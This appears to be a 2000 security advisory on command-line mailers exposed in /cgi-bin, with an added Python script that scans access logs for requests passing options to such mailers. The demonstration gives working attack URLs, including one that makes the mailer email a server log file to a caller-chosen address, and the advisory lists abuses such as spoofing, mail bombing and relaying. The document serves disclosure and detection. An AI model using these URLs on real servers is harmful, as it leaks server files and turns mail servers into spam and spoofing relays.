Reported December 12, 2000 by XATO

VERSIONS AFFECTED

DESCRIPTION

Multiple vulnerabilities have been discovered in command-line mailers. Vulnerabilities range from Denial of Service (DoS) attacks to information leakage and the writing and retrieving of unauthorized data.

DEMONSTRATION

If the mailer software is located in the /cgi-bin directory on the Web server, a user can launch it with the following URL:

http://yourserver/cgi-bin/mailer.exe

By adding a "-h" to the URL, as seen below, a user obtains a list of available options built into the mailer:

http://yourserver/cgi-bin/mailer.exe?-h

Because the query string is handed to the program as its command line, a user can also supply the options that select the sender, the recipient and a file to attach. The following URL causes the mailer to email the malicious user any file the Web server process can read; in this example the server's own Web log is sent:

http://yourserver/cgi-bin/mailer.exe?-f%20joe@example.com%20-t%20me@example.com%20-a%20c:\logs\web.log
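The reason a query string such as "?-h" reaches the program as a real option is the CGI convention for "indexed" queries: when QUERY_STRING contains no "=", the server splits it into words, URL-decodes them and passes them as command-line arguments (RFC 3875, section 4.4). The example below, added here and not part of the XATO advisory or of any vendor's mailer, models that decoding and then scans access-log lines for requests that hand a /cgi-bin mailer its own options, flagging option discovery (-h), caller-controlled sender or recipient (-f, -t) and server-file attachment (-a). The mailer name pattern, the log lines and the flag letters beyond those shown in the advisory are assumptions made for the example.

```python
# Added example, not code from the advisory or from any mailer vendor. It models
# how a CGI web server turns a query string into command-line arguments
# (RFC 3875 section 4.4) and then scans web-server access-log lines for requests
# that hand a /cgi-bin mailer its own options. The mailer name pattern and the
# sample log lines are constructed for the example.
import re
from urllib.parse import unquote

HELP_FLAGS = {"-h"}                 # option listing, as shown in the advisory
SENDER_RECIP_FLAGS = {"-f", "-t"}   # caller picks From/To: relay, spoofing, bombing
ATTACH_FLAGS = {"-a"}               # attach a server-side file to the mail


def cgi_argv(query_string):
    """Arguments a CGI program receives from an 'indexed' query.

    RFC 3875 4.4: when QUERY_STRING contains no '=', the server splits it on
    unencoded '+', URL-decodes each word and passes the words as argv. On a
    Windows server the words are joined into one command line that the
    program's C runtime re-splits on whitespace, which is why the advisory's
    %20-separated query also works; that re-split is modelled by the final
    .split() (quoting rules are ignored for brevity).
    """
    if "=" in query_string:
        return []            # form-style query: nothing reaches argv
    argv = []
    for word in query_string.split("+"):
        argv.extend(unquote(word).split())
    return argv


def attached_paths(argv):
    """Values given to -a, i.e. server files the request tries to mail out."""
    return [argv[i + 1] for i, a in enumerate(argv[:-1]) if a in ATTACH_FLAGS]


def classify(argv):
    """Abuse categories indicated by a decoded mailer argv (empty if benign)."""
    flags = {a for a in argv if a.startswith("-")}
    findings = set()
    if flags & HELP_FLAGS:
        findings.add("option-discovery")
    if flags & SENDER_RECIP_FLAGS:
        findings.add("caller-controlled-sender-or-recipient")
    if flags & ATTACH_FLAGS:
        findings.add("server-file-attachment")
    return findings


# Common Log Format; the mailer is assumed to live under /cgi-bin with "mail"
# in its name (adjust MAILER_RE to the real program name).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+'
)
MAILER_RE = re.compile(r"/cgi-bin/[^/?]*mail[^/?]*", re.I)


def scan_log(lines):
    """Return one finding dict per request that passes options to the mailer."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        path, _, query = m.group("url").partition("?")
        if not MAILER_RE.fullmatch(path) or not query:
            continue
        argv = cgi_argv(query)
        findings = classify(argv)
        if findings:
            hits.append({
                "ip": m.group("ip"),
                "time": m.group("ts"),
                "path": path,
                "argv": argv,
                "attachments": attached_paths(argv),
                "findings": sorted(findings),
            })
    return hits


# Constructed sample access-log lines (not real traffic).
SAMPLE_LOG = r"""
10.0.0.5 - - [12/Dec/2000:10:01:02 -0500] "GET /cgi-bin/mailer.exe?-h HTTP/1.0" 200 512
10.0.0.5 - - [12/Dec/2000:10:01:09 -0500] "GET /cgi-bin/mailer.exe?-f%20joe@example.com%20-t%20me@example.com%20-a%20c:\logs\web.log HTTP/1.0" 200 120
192.0.2.7 - - [12/Dec/2000:10:02:30 -0500] "POST /cgi-bin/mailer.exe HTTP/1.0" 200 88
192.0.2.7 - - [12/Dec/2000:10:03:00 -0500] "GET /cgi-bin/mailer.exe?to=me@example.com&subject=hi HTTP/1.0" 200 88
192.0.2.9 - - [12/Dec/2000:10:04:00 -0500] "GET /index.html HTTP/1.0" 200 1024
""".strip().splitlines()

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"{hit['time']} {hit['ip']} {hit['path']} argv={hit['argv']} "
              f"attachments={hit['attachments']} findings={hit['findings']}")
```

Run against the sample, only the two requests from 10.0.0.5 are reported: the "-h" probe and the request that names c:\logs\web.log as an attachment. A form-style query ("to=...&subject=...") produces no argv under the CGI rule and is left alone, which is also the property a safe deployment relies on: a mailer that must stay under /cgi-bin should be invoked through a wrapper that never forwards an indexed query string to the program's command line.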

The mailers also let a malicious user specify both the recipient and the sender, so anyone can use the server for unsolicited commercial email (UCE), flooding, mail bombing, resource draining, mail spoofing and denial of service.

Other problems found include INI and log files stored in the same (Web-accessible) directory as the mailer, and the ability to override the default settings, modify hidden form variables, exploit debug modes, monitor all mail sent through the server, and use the mailer as a bounce point for port scans and for brute-force password attacks.

VENDOR RESPONSE

Check your vendor's Web site for fix and upgrade information.

CREDIT
Discovered by
XATO